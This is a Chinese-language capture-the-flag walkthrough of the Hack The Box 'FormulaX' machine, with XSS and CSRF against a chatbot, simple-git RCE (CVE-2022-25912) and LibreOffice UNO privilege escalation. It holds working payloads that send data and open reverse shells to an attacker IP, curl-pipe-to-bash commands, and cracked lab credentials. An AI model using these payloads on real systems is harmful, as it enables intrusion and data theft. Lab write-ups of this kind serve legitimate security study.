[Meachines][Hard]FormulaX

2024-05-09 659 0

Main

$ nmap -sC -sV 10.10.11.6 --min-rate 1000

[Meachines][Hard]FormulaX插图

# echo '10.10.11.6 formula.htb'>>/etc/hosts

创建一个新用户,登录

[Meachines][Hard]FormulaX插图1

来到聊天窗口,发现普通用户无法使用

[Meachines][Hard]FormulaX插图2

来到联系页面,测试跨站

[Meachines][Hard]FormulaX插图3

{"first_name":"<img src='http://10.10.16.6/s-h4ck13'/>","last_name":"2","message":"2"}

[Meachines][Hard]FormulaX插图4

这里无法获取cookie,因为开启了httponly,

[Meachines][Hard]FormulaX插图5

幸运的是服务器开启了跨域资源访问

[Meachines][Hard]FormulaX插图6

在聊天窗口获取到了Chatbot发送消息的源码

[Meachines][Hard]FormulaX插图7

我们通过XSS对管理员进行CSRF攻击,泄露Chatbot的历史记录

//s-h4ck13.js
//利用Websocket来和机器人交互
const script = document.createElement('script');
script.src = 'https://www.freebuf.com/socket.io/socket.io.js';
document.head.appendChild(script);
script.addEventListener('load', function() {
	const res = axios.get(`/user/api/chat`);
	const socket = io('/',{withCredentials: true});
	socket.on('message', (my_message) => {
		fetch("http://10.10.16.6/?data=" + my_message)
		});
	socket.emit('client_message', 'history');
});

{"first_name":"<img src=x onerror=\"with(top)body.appendChild (createElement('script')).src='http://10.10.16.6/s-h4ck13.js'\">","last_name":"2","message":"2"}

利用管理员身份获取了Chatbot的历史记录

[Meachines][Hard]FormulaX插图8

[Meachines][Hard]FormulaX插图9

获取到了一个新的子域名

# echo '10.10.11.6 dev-git-auto-update.chatbot.htb'>>/etc/hosts

[Meachines][Hard]FormulaX插图10

[Meachines][Hard]FormulaX插图11

通过漏洞库搜索Simple-git在3.15之前存在一个RCE漏洞
CVE-2022-25912
[Meachines][Hard]FormulaX插图12

[Meachines][Hard]FormulaX插图13

const simpleGit = require('simple-git')
const git2 = simpleGit()
git2.clone('ext::sh -c touch% /tmp/pwn% >&2', '/tmp/example-new-repo', ["-c", "protocol.ext.allow=always"]);
# reverse.sh
#!/bin/bash
bash -i >& /dev/tcp/10.10.16.6/10032 0>&1

在Remote Git Url栏中输入payload

ext::sh -c curl% http://10.10.16.6/reverse.sh|bash

[Meachines][Hard]FormulaX插图14

$ netstat -lnput

可以看到MariaDB(3306),mongoDB(27017)数据库开放,我们在web目录下寻找数据库配置文件

[Meachines][Hard]FormulaX插图15

$ find ./ -type f -name '*db*' | while read -r file; do filename=$(basename "$file") if [ ${#filename} -le 15 ]; then echo "$file" fi done

[Meachines][Hard]FormulaX插图16

$ cat ./app/configuration/connect_db.js

[Meachines][Hard]FormulaX插图17

我们没有访问MariaDB的权限,但是可以访问mongoDB

[Meachines][Hard]FormulaX插图18

> use testing
> show collections
> db.users.find()

[Meachines][Hard]FormulaX插图19

[Meachines][Hard]FormulaX插图20

恰好frank_dorky用户也存在该主机

$2b$10$hrB/by.tb/4ABJbbt1l4/ep/L4CTY6391eSETamjLp7s.elpsB4J6

$ echo "\$2b\$10\$hrB/by.tb/4ABJbbt1l4/ep/L4CTY6391eSETamjLp7s.elpsB4J6">hash

$ hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt

[Meachines][Hard]FormulaX插图21

[Meachines][Hard]FormulaX插图22

username:frank_dorky
password:manchesterunited

[Meachines][Hard]FormulaX插图23

User Flag

$ cat /home/frank_dorky/user.txt

[Meachines][Hard]FormulaX插图24

e079c692881778c3880454b025b906b0

Root Flag

权限不足

[Meachines][Hard]FormulaX插图25

$ netstat -lnput

在之前3000端口上开放了一个web服务

[Meachines][Hard]FormulaX插图26

[Meachines][Hard]FormulaX插图27

我们通过ssh进行隧道代理把3000端口映射到kali

[kali]

$ ssh -L 3000:127.0.0.1:3000 [email protected]

[Meachines][Hard]FormulaX插图28

https://github.com/librenms/librenms
LibreNMS 是一个开源的网络监控系统,用于监控网络设备、服务器和服务的性能和状态。它提供了广泛的功能,包括自动发现、性能图表、警报通知、日志记录和自定义报告等,可帮助网络管理员和运维人员实时监控和管理其网络基础设施
[Meachines][Hard]FormulaX插图29

在/opt/librenms 目录有一些LibreNMS官方提供调试脚本,可供测试

但是frank_dorky用户和www-data用户均无法ls读取这个目录内文件,但是可以进入该目录执行脚本

[Meachines][Hard]FormulaX插图30

$ ./validate.php

可以确定版本是22.10.0

[Meachines][Hard]FormulaX插图31

在披露中,我们可以通过/opt/librenms/config_to_json.php来获取数据库的配置

[Meachines][Hard]FormulaX插图32

kai_relay这个用户在我们的/etc/passwd也存在

[Meachines][Hard]FormulaX插图33

username:kai_relay
password:mychemicalformulaX

再次通过ssh登录kai_relay用户

[Meachines][Hard]FormulaX插图34

$ groups;id;sudo -l

[Meachines][Hard]FormulaX插图35

$ cat /usr/bin/office.sh

[Meachines][Hard]FormulaX插图36

在无界面模式下启动 LibreOffice 或 OpenOffice 的 Calc(电子表格程序),并且通过指定的端口接受连接请求,不恢复以前的文档,不显示 logo,并且不使用默认模板。

将exp.py上传到服务器

# exp.py
#! /usr/bin/env python3
import uno
from com.sun.star.system import XSystemShellExecute

local = uno.getComponentContext()
resolver = local.ServiceManager.createInstanceWithContext("com.sun.star.bridge.UnoUrlResolver", local)
context = resolver.resolve("uno:socket,host=localhost,port=2002;urp;StarOffice.ComponentContext")
rc = context.ServiceManager.createInstance("com.sun.star.system.SystemShellExecute")
rc.execute("bash", "/tmp/reverse.sh", 1)
# reverse.sh
bash -i >& /dev/tcp/10.10.16.6/10034 0>&1

[靶机]
$ cd /tmp
$ curl http://10.10.16.6/exp.py -O;chmod +x exp.py
$ curl http://10.10.16.6/reverse.sh -O;chmod +x reverse.sh
[Meachines][Hard]FormulaX插图37
$ sudo /usr/bin/office.sh
[Meachines][Hard]FormulaX插图38

再开一个ssh

$ cd /tmp
$ netstat -lnput
可以看到127.0.0.1:2002开放了
$ python3 exp.py

[Meachines][Hard]FormulaX插图39

[Meachines][Hard]FormulaX插图40

838cf791e70b35799984bae602e49f0e

在/opt/librenms中存在一个添加用户的php文件,你可以用./addUser.php username password来进行添加用户,然后对3000端口web服务进行getshell,但是对于本实验中没有太大的用处


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论